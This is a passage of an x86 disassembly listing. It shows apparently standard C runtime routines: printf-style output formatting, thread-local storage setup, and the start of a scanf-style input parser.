mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_415246
; ---------------------------------------------------------------------------
loc_415010: ; CODE XREF: sub_414CA3+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_415020: ; CODE XREF: sub_414CA3+323�j
; sub_414CA3+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_4152F6
; ---------------------------------------------------------------------------
loc_41502E: ; CODE XREF: sub_414CA3+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_415069
mov ecx, [eax+4]
test ecx, ecx
jz short loc_415069
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_415060
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415060: ; CODE XREF: sub_414CA3+3AA�j
and [ebp+var_28], 0
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415069: ; CODE XREF: sub_414CA3+397�j
; sub_414CA3+39E�j
mov eax, off_42C748
mov [ebp+var_10], eax
push eax
jmp loc_415122
; ---------------------------------------------------------------------------
loc_415077: ; CODE XREF: sub_414CA3+2DE�j
jnz short loc_415087
cmp bl, 67h
jnz short loc_4150BE
mov [ebp+var_C], 1
jmp short loc_4150BE
; ---------------------------------------------------------------------------
loc_415087: ; CODE XREF: sub_414CA3:loc_415077�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_415094
mov [ebp+var_C], eax
loc_415094: ; CODE XREF: sub_414CA3+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_4150BE
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_41344D
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_4150BB
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_4150BE
; ---------------------------------------------------------------------------
loc_4150BB: ; CODE XREF: sub_414CA3+40F�j
mov [ebp+var_C], edi
loc_4150BE: ; CODE XREF: sub_414CA3+2EB�j
; sub_414CA3+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_42CE18
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_415103
cmp [ebp+var_C], 0
jnz short loc_415103
push esi
call off_42CE24
pop ecx
loc_415103: ; CODE XREF: sub_414CA3+450�j
; sub_414CA3+456�j
cmp bl, 67h
jnz short loc_415114
test edi, edi
jnz short loc_415114
push esi
call off_42CE1C
pop ecx
loc_415114: ; CODE XREF: sub_414CA3+463�j
; sub_414CA3+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_415121
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_415121: ; CODE XREF: sub_414CA3+474�j
push esi
loc_415122: ; CODE XREF: sub_414CA3+3CF�j
call sub_416000
pop ecx
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_41512D: ; CODE XREF: sub_414CA3+23E�j
sub eax, 69h
jz loc_414FE2
sub eax, 5
jz loc_4151F4
dec eax
jz loc_4151DA
dec eax
jz short loc_4151A7
sub eax, 3
jz loc_414F25
dec eax
dec eax
jz loc_414FE6
sub eax, 3
jnz loc_4152F6
mov [ebp+var_30], 27h
jmp short loc_4151B1
; ---------------------------------------------------------------------------
loc_41516C: ; CODE XREF: sub_414CA3+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_415179
inc eax
inc eax
loc_415175: ; CODE XREF: sub_414CA3+2BE�j
test ecx, ecx
jnz short loc_41516C
loc_415179: ; CODE XREF: sub_414CA3+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_415183: ; CODE XREF: sub_414CA3+2A2�j
test eax, eax
jnz short loc_41518F
mov eax, off_42C748
mov [ebp+var_10], eax
loc_41518F: ; CODE XREF: sub_414CA3+4E2�j
mov eax, [ebp+var_10]
jmp short loc_41519B
; ---------------------------------------------------------------------------
loc_415194: ; CODE XREF: sub_414CA3+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_41519F
inc eax
loc_41519B: ; CODE XREF: sub_414CA3+4EF�j
test ecx, ecx
jnz short loc_415194
loc_41519F: ; CODE XREF: sub_414CA3+4F5�j
sub eax, [ebp+var_10]
jmp loc_4152F3
; ---------------------------------------------------------------------------
loc_4151A7: ; CODE XREF: sub_414CA3+4A4�j
mov [ebp+var_C], 8
loc_4151AE: ; CODE XREF: sub_414CA3+256�j
mov [ebp+var_30], ecx
loc_4151B1: ; CODE XREF: sub_414CA3+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_414FED
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_414FED
; ---------------------------------------------------------------------------
loc_4151DA: ; CODE XREF: sub_414CA3+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_414FED
or byte ptr [ebp+var_8+1], 2
jmp loc_414FED
; ---------------------------------------------------------------------------
loc_4151F4: ; CODE XREF: sub_414CA3+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_41520D
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_415212
; ---------------------------------------------------------------------------
loc_41520D: ; CODE XREF: sub_414CA3+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_415212: ; CODE XREF: sub_414CA3+568�j
mov [ebp+var_34], 1
jmp loc_4153E5
; ---------------------------------------------------------------------------
loc_41521E: ; CODE XREF: sub_414CA3+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_41523C
test bl, 40h
jz short loc_415236
movsx eax, word ptr [eax-4]
loc_415233: ; CODE XREF: sub_414CA3+597�j
; sub_414CA3+59F�j
cdq
jmp short loc_415246
; ---------------------------------------------------------------------------
loc_415236: ; CODE XREF: sub_414CA3+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_415233
; ---------------------------------------------------------------------------
loc_41523C: ; CODE XREF: sub_414CA3+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_415233
xor edx, edx
loc_415246: ; CODE XREF: sub_414CA3+368�j
; sub_414CA3+591�j
test bl, 40h
jz short loc_415260
test edx, edx
jg short loc_415260
jl short loc_415255
test eax, eax
jnb short loc_415260
loc_415255: ; CODE XREF: sub_414CA3+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_415260: ; CODE XREF: sub_414CA3+5A6�j
; sub_414CA3+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_41526B
xor edi, edi
loc_41526B: ; CODE XREF: sub_414CA3+5C4�j
cmp [ebp+var_C], 0
jge short loc_41527A
mov [ebp+var_C], 1
jmp short loc_41528B
; ---------------------------------------------------------------------------
loc_41527A: ; CODE XREF: sub_414CA3+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_41528B
mov [ebp+var_C], eax
loc_41528B: ; CODE XREF: sub_414CA3+5D5�j
; sub_414CA3+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_415295
and [ebp+var_20], 0
loc_415295: ; CODE XREF: sub_414CA3+5EC�j
lea esi, [ebp+var_55]
loc_415298: ; CODE XREF: sub_414CA3+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_4152A8
mov eax, ebx
or eax, edi
jz short loc_4152CC
loc_4152A8: ; CODE XREF: sub_414CA3+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_413500
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_4152C7
add ecx, [ebp+var_30]
loc_4152C7: ; CODE XREF: sub_414CA3+61F�j
mov [esi], cl
dec esi
jmp short loc_415298
; ---------------------------------------------------------------------------
loc_4152CC: ; CODE XREF: sub_414CA3+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_4152F6
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_4152E9
test eax, eax
jnz short loc_4152F6
loc_4152E9: ; CODE XREF: sub_414CA3+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_4152F3: ; CODE XREF: sub_414CA3+3B8�j
; sub_414CA3+3C1�j ...
mov [ebp+var_14], eax
loc_4152F6: ; CODE XREF: sub_414CA3+270�j
; sub_414CA3+339�j ...
cmp [ebp+var_34], 0
jnz loc_4153E5
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_41532E
test bh, 1
jz short loc_415313
mov [ebp+var_1C], 2Dh
jmp short loc_415327
; ---------------------------------------------------------------------------
loc_415313: ; CODE XREF: sub_414CA3+668�j
test bl, 1
jz short loc_41531E
mov [ebp+var_1C], 2Bh
jmp short loc_415327
; ---------------------------------------------------------------------------
loc_41531E: ; CODE XREF: sub_414CA3+673�j
test bl, 2
jz short loc_41532E
mov [ebp+var_1C], 20h
loc_415327: ; CODE XREF: sub_414CA3+66E�j
; sub_414CA3+679�j
mov [ebp+var_20], 1
loc_41532E: ; CODE XREF: sub_414CA3+663�j
; sub_414CA3+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_41534D
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_414C48
add esp, 0Ch
loc_41534D: ; CODE XREF: sub_414CA3+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_414C6C
test bl, 8
pop ecx
jz short loc_415378
test bl, 4
jnz short loc_415378
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_414C48
add esp, 0Ch
loc_415378: ; CODE XREF: sub_414CA3+6BF�j
; sub_414CA3+6C4�j
cmp [ebp+var_28], 0
jz short loc_4153BF
cmp [ebp+var_14], 0
jle short loc_4153BF
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_41538D: ; CODE XREF: sub_414CA3+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41AADA
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_4153CE
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_414C6C
cmp [ebp+var_40], 0
pop ecx
jnz short loc_41538D
jmp short loc_4153CE
; ---------------------------------------------------------------------------
loc_4153BF: ; CODE XREF: sub_414CA3+6D9�j
; sub_414CA3+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_414C6C
pop ecx
loc_4153CE: ; CODE XREF: sub_414CA3+702�j
; sub_414CA3+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_4153E5
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_414C48
add esp, 0Ch
loc_4153E5: ; CODE XREF: sub_414CA3+576�j
; sub_414CA3+657�j ...
cmp [ebp+var_2C], 0
jz short loc_4153F8 ; default
push [ebp+var_2C]
call sub_412FE4
and [ebp+var_2C], 0
pop ecx
loc_4153F8: ; CODE XREF: sub_414CA3+74�j
; sub_414CA3+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_414CD8
loc_415405: ; CODE XREF: sub_414CA3+40�j
pop edi
pop esi
loc_415407: ; CODE XREF: sub_414CA3+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_4182D6
leave
retn
sub_414CA3 endp
; ---------------------------------------------------------------------------
off_415418 dd offset loc_414EA2 ; DATA XREF: sub_414CA3+7A�r
dd offset loc_414D24 ; jump table for switch statement
dd offset loc_414D41
dd offset loc_414D8D
dd offset loc_414DC8
dd offset loc_414DD1
dd offset loc_414E09
dd offset loc_414EDB
; =============== S U B R O U T I N E =======================================
sub_415438 proc near ; CODE XREF: sub_4154C7:loc_4154E0�p
; sub_4154C7:loc_41552D�p
call sub_416818
mov eax, dword_42C750
cmp eax, 0FFFFFFFFh
jz short locret_415455
push eax
call ds:dword_41F150 ; TlsFree
or dword_42C750, 0FFFFFFFFh
locret_415455: ; CODE XREF: sub_415438+D�j
retn
sub_415438 endp
; =============== S U B R O U T I N E =======================================
sub_415456 proc near ; CODE XREF: sub_412D64�p sub_412D71�p ...
push ebx
push esi
call ds:dword_41F008 ; RtlGetLastWin32Error
push dword_42C750
mov ebx, eax
call ds:dword_41F160 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_4154BB
push 88h
push 1
call sub_41AB01
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4154B3
push esi
push dword_42C750
call ds:dword_41F15C ; TlsSetValue
test eax, eax
jz short loc_4154B3
mov dword ptr [esi+54h], offset dword_42CFE0
mov dword ptr [esi+14h], 1
call ds:dword_41F158 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_4154BB
; ---------------------------------------------------------------------------
loc_4154B3: ; CODE XREF: sub_415456+2E�j
; sub_415456+3F�j
push 10h
call sub_4148E1
pop ecx
loc_4154BB: ; CODE XREF: sub_415456+1A�j
; sub_415456+5B�j
push ebx
call ds:dword_41F154 ; RtlSetLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_415456 endp
; =============== S U B R O U T I N E =======================================
sub_4154C7 proc near ; CODE XREF: .text:loc_414A05�p
call sub_4167CF
test eax, eax
jz short loc_4154E0
call ds:dword_41F164 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_42C750, eax
jnz short loc_4154E8
loc_4154E0: ; CODE XREF: sub_4154C7+7�j
call sub_415438
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4154E8: ; CODE XREF: sub_4154C7+17�j
push esi
push 88h
push 1
call sub_41AB01
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41552D
push esi
push dword_42C750
call ds:dword_41F15C ; TlsSetValue
test eax, eax
jz short loc_41552D
mov dword ptr [esi+54h], offset dword_42CFE0
mov dword ptr [esi+14h], 1
call ds:dword_41F158 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41552D: ; CODE XREF: sub_4154C7+34�j
; sub_4154C7+45�j
call sub_415438
xor eax, eax
pop esi
retn
sub_4154C7 endp
; =============== S U B R O U T I N E =======================================
sub_415536 proc near ; CODE XREF: sub_41554C+52�p
; sub_41554C+1EF�p ...
dec dword ptr [edx+4]
js short loc_415544
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_415544: ; CODE XREF: sub_415536+3�j
push edx
call sub_417455
pop ecx
retn
sub_415536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41554C proc near ; CODE XREF: sub_412D93+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_427878
call __SEH_prolog
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_41557A: ; CODE XREF: sub_41554C+88�j
; sub_41554C+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_415FB9
movzx eax, al
push eax
call sub_41AC35
pop ecx
test eax, eax
jz short loc_4155D6
dec [ebp+var_30]
loc_415598: ; CODE XREF: sub_41554C+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov esi, eax
push esi
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_415598
cmp esi, 0FFFFFFFFh
jz short loc_4155C0
push [ebp+arg_0]
push esi
call sub_41AC6F
pop ecx
pop ecx
loc_4155C0: ; CODE XREF: sub_41554C+67�j
; sub_41554C+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_4155C0
jmp short loc_41557A
; ---------------------------------------------------------------------------
loc_4155D6: ; CODE XREF: sub_41554C+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_415F35
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_415613: ; CODE XREF: sub_41554C+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415634
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_4156CE
; ---------------------------------------------------------------------------
loc_415634: ; CODE XREF: sub_41554C+D7�j
cmp ebx, 4Eh
jg short loc_4156AC
jz loc_4156CE
cmp ebx, 2Ah
jz short loc_4156A7
cmp ebx, 46h
jz loc_4156CE
cmp ebx, 49h
jz short loc_41565C
cmp ebx, 4Ch
jnz short loc_4156BB
inc [ebp+var_4F]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41565C: ; CODE XREF: sub_41554C+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_41567B
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_41567B
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41567B: ; CODE XREF: sub_41554C+116�j
; sub_41554C+11E�j
cmp cl, 33h
jnz short loc_41568C
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_41568C
mov esi, eax
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41568C: ; CODE XREF: sub_41554C+132�j
; sub_41554C+13A�j
cmp cl, 64h
jz short loc_4156CE
cmp cl, 69h
jz short loc_4156CE
cmp cl, 6Fh
jz short loc_4156CE
cmp cl, 78h
jz short loc_4156CE
cmp cl, 58h
jnz short loc_4156BB
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156A7: ; CODE XREF: sub_41554C+F6�j
inc [ebp+var_4B]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156AC: ; CODE XREF: sub_41554C+EB�j
cmp ebx, 68h
jz short loc_4156C8
cmp ebx, 6Ch
jz short loc_4156C0
cmp ebx, 77h
jz short loc_4156C3
loc_4156BB: ; CODE XREF: sub_41554C+109�j
; sub_41554C+157�j
inc [ebp+var_4C]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156C0: ; CODE XREF: sub_41554C+168�j
inc [ebp+var_4F]
loc_4156C3: ; CODE XREF: sub_41554C+16D�j
inc [ebp+var_4E]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156C8: ; CODE XREF: sub_41554C+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_4156CE: ; CODE XREF: sub_41554C+E3�j
; sub_41554C+ED�j ...
cmp [ebp+var_4C], 0
jz loc_415613
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_4156F8
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_4156FB
; ---------------------------------------------------------------------------
loc_4156F8: ; CODE XREF: sub_41554C+196�j
mov ebx, [ebp+var_64]
loc_4156FB: ; CODE XREF: sub_41554C+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_415719
mov al, [esi]
cmp al, 53h
jz short loc_415715
cmp al, 43h
jz short loc_415715
or [ebp+var_4E], 0FFh
jmp short loc_415719
; ---------------------------------------------------------------------------
loc_415715: ; CODE XREF: sub_41554C+1BD�j
; sub_41554C+1C1�j
mov [ebp+var_4E], 1
loc_415719: ; CODE XREF: sub_41554C+1B7�j
; sub_41554C+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_415750
cmp edi, 63h
jz loc_4157B0
cmp edi, 7Bh
jz short loc_4157B0
loc_415735: ; CODE XREF: sub_41554C+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov esi, eax
push esi
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_415735
mov [ebp+var_28], esi
loc_415750: ; CODE XREF: sub_41554C+1D9�j
mov esi, [ebp+arg_0]
loc_415753: ; CODE XREF: sub_41554C+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_415764
cmp [ebp+var_48], 0
jz loc_4159B9
loc_415764: ; CODE XREF: sub_41554C+20C�j
cmp edi, 6Fh
jg loc_415988
jz loc_415CFB
cmp edi, 63h
jz loc_415967
cmp edi, 64h
jz loc_415CFB
jle loc_4159AE
cmp edi, 67h
jle short loc_4157DA
cmp edi, 69h
jz short loc_4157C2
cmp edi, 6Eh
jnz loc_4159AE
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_415F0D
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_4157B0: ; CODE XREF: sub_41554C+1DE�j
; sub_41554C+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_415536
mov [ebp+var_28], eax
jmp short loc_415753
; ---------------------------------------------------------------------------
loc_4157C2: ; CODE XREF: sub_41554C+247�j
push 64h
pop edi
loc_4157C5: ; CODE XREF: sub_41554C+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_415BF4
mov [ebp+var_4A], 1
jmp loc_415BF9
; ---------------------------------------------------------------------------
loc_4157DA: ; CODE XREF: sub_41554C+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4157F6
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_4157FB
; ---------------------------------------------------------------------------
loc_4157F6: ; CODE XREF: sub_41554C+29A�j
cmp ebx, 2Bh
jnz short loc_415812
loc_4157FB: ; CODE XREF: sub_41554C+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_415815
; ---------------------------------------------------------------------------
loc_415812: ; CODE XREF: sub_41554C+2AD�j
mov edi, [ebp+arg_0]
loc_415815: ; CODE XREF: sub_41554C+2C4�j
cmp [ebp+var_44], 0
jz short loc_415824
cmp [ebp+var_48], 15Dh
jle short loc_41584C
loc_415824: ; CODE XREF: sub_41554C+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_41584C
; ---------------------------------------------------------------------------
loc_41582D: ; CODE XREF: sub_41554C+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_415857
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_41584C: ; CODE XREF: sub_41554C+2D6�j
; sub_41554C+2DF�j
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_41582D
loc_415857: ; CODE XREF: sub_41554C+2E9�j
cmp byte_42D090, bl
jnz short loc_4158A9
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4158A9
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov al, byte_42D090
mov [esi], al
inc esi
jmp short loc_41589B
; ---------------------------------------------------------------------------
loc_41587F: ; CODE XREF: sub_41554C+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4158A9
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
loc_41589B: ; CODE XREF: sub_41554C+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_41587F
loc_4158A9: ; CODE XREF: sub_41554C+311�j
; sub_41554C+31B�j ...
cmp [ebp+var_40], 0
jz short loc_41591E
cmp ebx, 65h
jz short loc_4158B9
cmp ebx, 45h
jnz short loc_41591E
loc_4158B9: ; CODE XREF: sub_41554C+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41591E
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_4158E0
mov [esi], al
inc esi
jmp short loc_4158E5
; ---------------------------------------------------------------------------
loc_4158E0: ; CODE XREF: sub_41554C+38D�j
cmp ebx, 2Bh
jnz short loc_415913
loc_4158E5: ; CODE XREF: sub_41554C+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_415904
and [ebp+var_48], eax
jmp short loc_415913
; ---------------------------------------------------------------------------
loc_4158F4: ; CODE XREF: sub_41554C+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41591E
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_415904: ; CODE XREF: sub_41554C+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_415913: ; CODE XREF: sub_41554C+397�j
; sub_41554C+3A6�j
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_4158F4
loc_41591E: ; CODE XREF: sub_41554C+361�j
; sub_41554C+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_41592F
push edi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_41592F: ; CODE XREF: sub_41554C+3D8�j
cmp [ebp+var_40], 0
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz loc_415F2D
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_42CE20
add esp, 0Ch
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415967: ; CODE XREF: sub_41554C+22A�j
test ecx, ecx
jnz short loc_415975
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_415975: ; CODE XREF: sub_41554C+41D�j
; sub_41554C+44A�j
cmp [ebp+var_4E], 0
jle loc_415B00
mov [ebp+var_4D], 1
jmp loc_415B00
; ---------------------------------------------------------------------------
loc_415988: ; CODE XREF: sub_41554C+21B�j
mov eax, edi
sub eax, 70h
jz loc_415CF7
sub eax, 3
jz short loc_415975
dec eax
dec eax
jz loc_415CFB
sub eax, 3
jz loc_4157C5
sub eax, 3
jz short loc_4159DA
loc_4159AE: ; CODE XREF: sub_41554C+239�j
; sub_41554C+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_4159C2
loc_4159B9: ; CODE XREF: sub_41554C+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_415F89
; ---------------------------------------------------------------------------
loc_4159C2: ; CODE XREF: sub_41554C+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_415F2D
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_4159DA: ; CODE XREF: sub_41554C+460�j
cmp [ebp+var_4E], 0
jle short loc_4159E4
mov [ebp+var_4D], 1
